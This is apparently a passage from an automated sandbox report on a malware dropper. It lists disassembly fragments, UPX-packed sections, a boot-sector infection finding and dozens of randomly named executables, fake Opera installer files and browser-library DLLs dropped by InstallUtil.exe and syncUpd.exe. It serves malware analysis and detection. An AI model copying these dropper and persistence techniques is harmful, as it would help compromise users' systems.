                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00483F88 push 00484096h; ret 14_2_0048408E
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004062B4 push ecx; mov dword ptr [esp], eax14_2_004062B5
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004104E0 push ecx; mov dword ptr [esp], edx14_2_004104E5
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00412928 push 0041298Bh; ret 14_2_00412983
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00494CAC push ecx; mov dword ptr [esp], ecx14_2_00494CB1
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0040CE38 push ecx; mov dword ptr [esp], edx14_2_0040CE3A
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004592D0 push 00459314h; ret 14_2_0045930C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0040F398 push ecx; mov dword ptr [esp], edx14_2_0040F39A
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00443440 push ecx; mov dword ptr [esp], ecx14_2_00443444
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0040546D push eax; ret 14_2_004054A9
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0040553D push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004055BE push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00485678 push ecx; mov dword ptr [esp], ecx14_2_0048567D
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0040563B push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004056A0 push 00405749h; ret 14_2_00405741
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004517F8 push 0045182Bh; ret 14_2_00451823
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004519BC push ecx; mov dword ptr [esp], eax14_2_004519C1
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00477B08 push ecx; mov dword ptr [esp], edx14_2_00477B09
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00419C28 push ecx; mov dword ptr [esp], ecx14_2_00419C2D
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045FD1C push ecx; mov dword ptr [esp], ecx14_2_0045FD20
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00499D30 pushad ; retf 14_2_00499D3F
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Contains functionality to infect the boot sector
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive016_2_00401A4F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\oUnpZjKgjJgNH93xPx2I8mpn.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Rt1fDJgieviHwJMnSI1q15oh.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_108.0.5067.24_Autoupdate_x64[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libogg-0.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\yjgJ9nt4OTDWzyoY4NSDLOwM.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\dT5XD26YPNzEYfrQcE2X8ih2.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\BXPlhyu5Y5wZKxacaQ0MJ8m7.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027440668612.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\4Q81HIYmOK1SegnFxkPpwM9e.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\tQS97uWWtHJ2H92y7dke3VAE.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280932613620.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\2F22VRFSBNYWhRCIxmDEOfGG.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210274997611284.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\I6q6xa8OpNqFa1GE2NL68OxV.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\lznQzS1TH9pXKZRxAqzqQkL6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\UprBod0MfH0m1ueg8M7NFcZO.exeJump to dropped file
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeFile created: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\qG1eZgNFl32oR6XaByxxsti8.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeFile created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJump to dropped file
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeFile created: C:\Users\user\AppData\Local\Temp\nso877A.tmp\INetC.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\3Dkw4ZNwPrQyjD2TIlPKqqcu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Hop5LZOSpSEQI7m8FjwEmAFM.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\jCE8bXuh8rIt9xQkDFallzd3.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\VNELGq4SA6E208JFhlubKLrW.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\zCH6Ixp4hDhbc4JHLXEIat9x.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\uxptymMcmvbx69QBLmPJcQze.exeJump to dropped file
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\1EkTthwf6man8aNjDkP3iYby.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\x04n3uUaS11tAr964Wnf0UiP.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\qfkuB5AfAibkngkYmzaWujj1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\HTdfKOlxDXLXF51uNbI6vixn.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Xm54wLBRTMA3iYcjiLbASkwx.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\rE439KsrV4PvRPEPLReHeUKA.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\wY4rC1FxrpCjj3T82kMrcxVU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\kO0savj64UXXAiEut7imvfm6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\9ZQJrRTgdPaUJ304O2m7brvm.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\8aNg0kr81H7icHssfXxzSpJA.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\tXjvjjDiP8Yt1Jt8HVI20nW0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\DPGpD7PIH8c8yVMwr4qCC9xb.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_packageJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\SgAcco9DZkNoSLENpGeXyqR0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\3MdVqnAjjJf11QnuXHbMYjzK.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CpPXXcmjwTrziBJjEjzVBqIO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\TnWsoNZIfxfOxOyjMDzsjp4X.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\zrNC9V37VM40VjYOUVLhb0U4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CdEhnJSfHuIH8YctINSx9az5.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\SwLW7tCu3MPLSebktZR0Do4H.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\lXVa1j6vkIafyXGwBSkciSaS.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CtkVfcoX8wimAKTiEdjfwDJu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\UxKWXTOyF8lfN9EFXnRW4uyo.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\eEM7C0Rv28sfywWhlfTCHeZU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\qz6mIWczIdkFWvUoxRClMBD1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\QIr2p18CO0NWQIPJWCtoKG30.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CS3CADtKPwRlkcskf1l0OgKj.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\FB8WWwveYgNXuiUkbF3okOil.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\49zPHg8djprKbR3fbyK34TE8.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\MzHVcwfiHGLesknyk5lMjLDt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\TUgcsAhZj9KS9L7Y6WBtONe5.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\FPqrFrEMEodivHfNwvaAYSOn.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\cJULOAzDG8uw9IL3YQcAMkXZ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\DdT3rCn1HYZaeiTB6islHQa6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\FhrkCEo26ZJ4quT9M55j4UZC.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\f6TPmOqJ9OCeCveaR02i6cCx.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exeJump to dropped file
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeFile created: C:\Users\user\AppData\Local\Temp\syncUpd.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-QD6MG.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\8jUidrpuHoVjNOY4pHjFpeFG.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\K8iQZVR1QcKL7tq874t7OVK9.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\51fuIpAxuIxVSFNlFyLCdDUf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\dJWgkx2NkzIq27ZmDKfJlJSb.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\f2hw2VKIAGcHQqAtIrjN8igU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\EG9LlsStc5z1vHzpFwj8p7wd.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\BOLsN3rxBHAIGUMuUJ7tVz6n.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\dWXd3iKvKIXWjmhGzJ9IYi7c.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\E4yp79Qa2EvDhsHlzSxMTwUz.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\W9H4HN9nxOMI1O5S9bvIXaEw.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\psx7APF9OMF37aNjA84tdfdB.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\jF6qc598AF3P3yZTYHAMeb77.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\4ie4IrFHavveqFWO7SvVdq2i.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NQMtpPx9qXPy8v0LlF2Kjrle.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\Z7skxxTmXai6Pa9s6OHd8pTL.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\f3pOxPQt48GSFGTaAT61XRX4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\u9uxsYMpS7D32QErsHuYUixB.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-JGFR0.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\xPkU0vAnxq9kCf406fqJmxI3.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\zILQneSJVLXUhxcgTc89dcSy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\JqI9qtwrsBIQ597pcbH2GGod.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\nGTzGa5UK9rAljUvktVMxS0i.exeJump to dropped file
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027464559972.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-IJOFC.tmpJump to dropped file
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280464513384.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\4mWZecCdz0lcVaculQKtsYsb.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_packageJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\tq2omEDUE6K9wwE4bnua6F2o.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-AD4K7.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bphIzQx0dXuhocT7snNOGKWG.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NIrszCqD63mWfcibv0YdSwFl.exeJump to dropped file
                        Source: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exeFile created: C:\Users\user\AppData\Local\Temp\is-TUI0V.tmp\mlSjlt4YcfcpuVp4aQsoCouK.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\cOpSW0Wlkj1ce9hBfVKYpMs8.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\6kncXrojwkHyPQnSTc2Nn28Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\wQY4uiHIT1Rmw3D6dX7Mml4K.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\tOekaWBMtMvKgKTpn1rNSApR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\K3GYZyKSoKi9rBsYPEMYaWx1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\ocxqlsVNXtyLzp2zpxnsa8Mt.exeJump to dropped file
